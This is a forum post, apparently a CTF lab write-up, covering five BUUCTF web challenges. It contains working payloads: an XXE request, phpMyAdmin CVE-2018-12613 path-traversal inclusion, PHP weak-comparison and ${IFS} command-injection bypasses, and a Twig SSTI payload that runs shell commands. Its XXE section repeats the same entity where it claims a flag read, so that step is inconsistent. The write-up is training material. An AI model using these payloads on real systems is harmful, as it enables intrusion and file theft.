论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
BUUCTF-WEB(41-45)
BUUCTF-WEB(41-45)
反转基因福娃
金牌会员
|
2024-5-27 23:13:55
|
显示全部楼层
|
阅读模式
楼主
主题
916
|
帖子
916
|
积分
2748
[NCTF2019]Fake XML cookbook
代码处找到
题目也提示了是xxe,我们抓包搞一下
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY xxe "hack">]>
<user><username>&xxe;</username><password>123</password></user>
复制代码
然后我们就读取一下这个flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY xxe "hack">]>
<user><username>&xxe;</username><password>123</password></user>
复制代码
成功拿下flag
[GWCTF 2019]我有一个数据库
参考:
[BUUCTF
GWCTF 2019] 我有一个数据库_buuctf我有有一个数据库-CSDN博客
扫描目录有一个robots.txt
phpinfo.php
复制代码
内里让我们去访问phpinfo.php
然后还有扫到phpmyadmin的目录,我们去访问一下
搜集到信息
然后搜版本号找到漏洞CVE-2018-12613
phpMyAdmin 4.8.1背景文件包含漏洞(CVE-2018-12613)_phpmyadmin4.8.1 漏洞-CSDN博客
?target=db_sql.php%253f/../../../../../../../../flag
复制代码
[BJDCTF2020]Mark loves cat
参考:[
BJDCTF2020]Mark loves cat | 四种解法 (新解法:强类型比较绕过) - Nestar - 博客园 (cnblogs.com)
这边看到有git泄露
我就直接githack跑了一下
但是啊,我这边githack没啥用很奇怪,什么都没提取出来
然后我就在我本身的机器上跑,没在kali了
也是皇天不负有心人,终于得到了
然后我们打开flag.php确认了flag的位置
然后就打开了index.php
看着有点变量覆盖的味道,然后exit就是die
我们看看第二个条件
就是flag不被GET,POST赋值就输出yds这个变量,但是我们又想让$yds=$flag,那我们就可以利用这个GET这个方法
如果我们GET传入的是
yds=flag
复制代码
经过那个变量覆盖就是
$yds=$flag
复制代码
最后输出$yds的值,也就是flag,得到flag(这个回显是在这个网页的最左下角)
更多解法,大家可以看[
BJDCTF2020]Mark loves cat | 四种解法 (新解法:强类型比较绕过) - Nestar - 博客园 (cnblogs.com)
[WUSTCTF2020]朴素无华
robots.txt发现一个文件
bp抓包后发现
我这里一直乱码
我这边利用了egde浏览器,然后下了一个扩展
来体现
第一层绕过就是
科学计数法:经过本地测试,在php版本小于等于7.0.9时,intval("1e2")的结果是1,即转换字符串时,遇到字母停止,但是intval("1e2"+1)的结果却是101,这种特性可以绕过诸如intval($num)>2020&&intval($num)>2021。但是当php版本>7.0.9时,这种方法就失效了,因为intval("1e2")和intval(1e2)的值均为100。
复制代码
payload如下:
num=1e4
复制代码
第二层就是MD5弱比较只要本身字符串0e开头,MD5加密后还是0e开头就行
md5=0e215962017
复制代码
第三层
strstr那个判定就是我们不能有空白符,我们可以用${IFS}绕过
意思就是不能用cat
我们先ls看一下文件
?num=1e4&md5=0e215962017&get_flag=ls
复制代码
然后查看文件
?num=1e4&md5=0e215962017&get_flag=c''at${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
复制代码
[BJDCTF2020]Cookie is so stable
参考:
[buuctf-
BJDCTF2020]Cookie is so stable(小宇特详解)_buuctf cookie is so stable-CSDN博客
upfine的博客 (cnblogs.com)
1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)
提示就是cookie,我们拿去解密一下,MD5解密,解不出来说明我有题目
然后就是SSTI,我输入了
{{7*7}}
复制代码
回显就是49,说明存在模板注入
payload:
user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
反转基因福娃
金牌会员
这个人很懒什么都没写!
楼主热帖
设计模式---组合模式
【Unity3D】Transform组件
拿到12家offer,想给大家分享一下面试 ...
Spark快速上手(4)Spark核心编程-Spark ...
【渗透攻击】PowerShell与Shell 有什么 ...
如何将鸿蒙(harmonyOS)系统退回安卓 ...
写了这么久Java项目,是否还记得你的第 ...
echarts使用及遇到的问题
使用 Kubeadm 部署 K8S安装
软件工程经济学第一章
标签云
存储
挺好的
服务器
快速回复
返回顶部
返回列表